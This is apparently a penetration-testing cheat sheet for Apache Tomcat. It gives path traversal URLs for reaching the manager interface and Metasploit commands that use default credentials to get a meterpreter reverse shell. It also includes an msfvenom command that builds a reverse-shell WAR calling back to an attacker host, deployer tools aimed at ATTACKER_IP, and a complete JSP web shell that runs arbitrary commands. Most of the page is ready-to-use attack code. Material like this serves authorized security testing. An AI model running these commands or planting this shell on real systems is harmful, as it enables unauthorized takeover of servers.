Exploitation
Topics
Common Vulnerabilities
Password Backtrace Disclosure Visiting /auth.jsp might reveal passwords in backtraces.
Double URL Encoding Vulnerabilities like CVE-2007-1860 allow management interface access via:
pathTomcat/%252E%252E/manager/html
Insecure Example Scripts Apache Tomcat versions 4.x–7.x include examples susceptible to XSS or information disclosure. Examples:
/examples/jsp/num/numguess.jsp
/examples/servlet/HelloWorldExample
Check and restrict access to these paths.
Path Traversal Exploit path traversal with:
<tomcat_target_ip>/lalala/..;/manager/html
or
http://<tomcat_target_ip>/;param=value/manager/html
Using Metasploit Framework
Leverage the tomcat_mgr_upload
exploit available in Metasploit for Tomcat file upload vulnerabilities. Launch Metasploit and execute the following commands:
msfconsole -q
search tomcat_mgr_upload
use 3
set rhosts <tomcat_target_ip>
set rport 8080
set httpusername admin
set httppassword password
set payload linux/x86/meterpreter_reverse_tcp
exploit
After exploitation, a reverse shell is obtained, allowing command execution via the meterpreter
shell.
Remote Code Execution (RCE)
If you gain access to the /manager/html interface, you can upload and deploy a .war
file to achieve RCE.
Example:
curl --upload-file shell.war -u 'tomcat:password' "http://localhost:8080/manager/text/deploy?path=/shell"
Metasploit can automate this:
use exploit/multi/http/tomcat_mgr_upload
To create a reverse shell WAR file:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o shell.war
Other Methods
TomcatWarDeployer Deploy shells or bind shells via:
./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
Clusterd Automate testing:
clusterd.py -i <attacker_machine> -a tomcat -v 5.5 --gen-payload <tomcat_target_ip>:4444 --deploy shell.war
Manual Web Shell Example JSP for command execution:
<FORM METHOD=GET ACTION='index.jsp'> <INPUT name='cmd' type=text> <INPUT type=submit value='Run'> </FORM> <%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { Process p = Runtime.getRuntime().exec(cmd,null,null); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s+"</br>"; } } %> <pre><%=output %></pre>
Package it into a WAR file and upload it.
Other Tools
Last updated